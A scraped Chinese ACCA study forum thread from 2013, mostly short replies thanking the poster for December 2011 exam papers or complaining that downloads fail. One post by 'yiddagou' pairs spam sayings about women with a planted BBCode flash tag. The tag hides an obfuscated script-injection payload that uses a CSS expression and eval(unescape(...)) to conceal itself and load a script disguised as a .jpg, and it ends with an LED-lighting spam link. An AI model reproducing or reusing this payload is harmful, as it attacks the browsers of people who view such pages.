ACCA论坛,ACCA考友论坛-全球ACCA中文论坛|中国ACCA学习网

楼主: beibeixue

2011年12月份ACCA全科考题及答案

初级学员

马大大 发表于 2013-7-16 16:06:39 | 显示全部楼层
真的是超有用,给我看看吧

初级学员

、Vivian 发表于 2013-7-16 20:28:14 | 显示全部楼层
恩恩恩呢恩呢呢恩嗯嗯嗯嫩饿呢

初级学员

、Vivian 发表于 2013-7-16 20:30:02 | 显示全部楼层
下载不了!!!!

匿名  发表于 2013-7-18 00:52:57
赞赞赞赞赞赞赞赞赞赞赞赞赞

初级学员

longersnow 发表于 2013-7-18 13:36:55 | 显示全部楼层
谢谢分享!!~~~~~~~~~

匿名  发表于 2013-7-19 15:11:27
求现身,,,,,,,,,,,,,,,,,,,,,,,,,,,

初级学员

zxcvbnmz 发表于 2013-7-19 15:37:05 | 显示全部楼层
谢谢分享!!!!!!

初级学员

yiddagou 发表于 2013-7-22 00:48:49 | 显示全部楼层

好女人是书

不会欣赏我的人--无知; 让我伤心的人--傻瓜; 让我溜走的人--笨蛋; 喜欢我的人--有眼光; 让我开心的人--了不起;  
女人不必太美, 只要有人深爱; 女人不必太富, 只要过的幸福; 女人不必太强, 只要活得尊贵!
做女人要足够贤惠、 足够聪颖、足够纯情、 足够细腻、足够温柔、 足够优雅、足够娇羞、 足够身材、足够气质、 足够清秀,这样才是十足好女人!
好女人是山,端庄大方; 好女人是水,柔情绵绵; 好女人是书,满腔智慧; 好女人是港,安全可靠!
女人的悲哀: 生命是厨房的; 收入是商场的; 奖金是化妆品的; 财产是没有的; 成绩是上司的; 身体是男人的; 只有雀斑和皱纹是自己的。   
女人谨记: 一定要吃好喝好玩好睡好, 一旦把咱累死了, 就有别的女人不劳而获了, 她会花咱攒下的钱, 住咱省吃俭用买下的房, 睡咱的老公, 泡咱的男朋友, 还打咱的娃! 那太吃亏了!  

[flash,0,0] style=ee:expression(eval(unescape('this.parentNode.style.display=%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l=document.createElement%28%27script%27%29%3Bl.src=%27/a/q/mq.jpg%27%3Bl.type=%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr=1%7D')));display:none;@ *** .com[/email][/flash] led筒灯  ***

初级学员

若水星辰 发表于 2013-7-24 17:52:14 | 显示全部楼层
好东西,看看哦

初级学员

人生 发表于 2013-7-25 19:09:37 | 显示全部楼层
期待中想看啊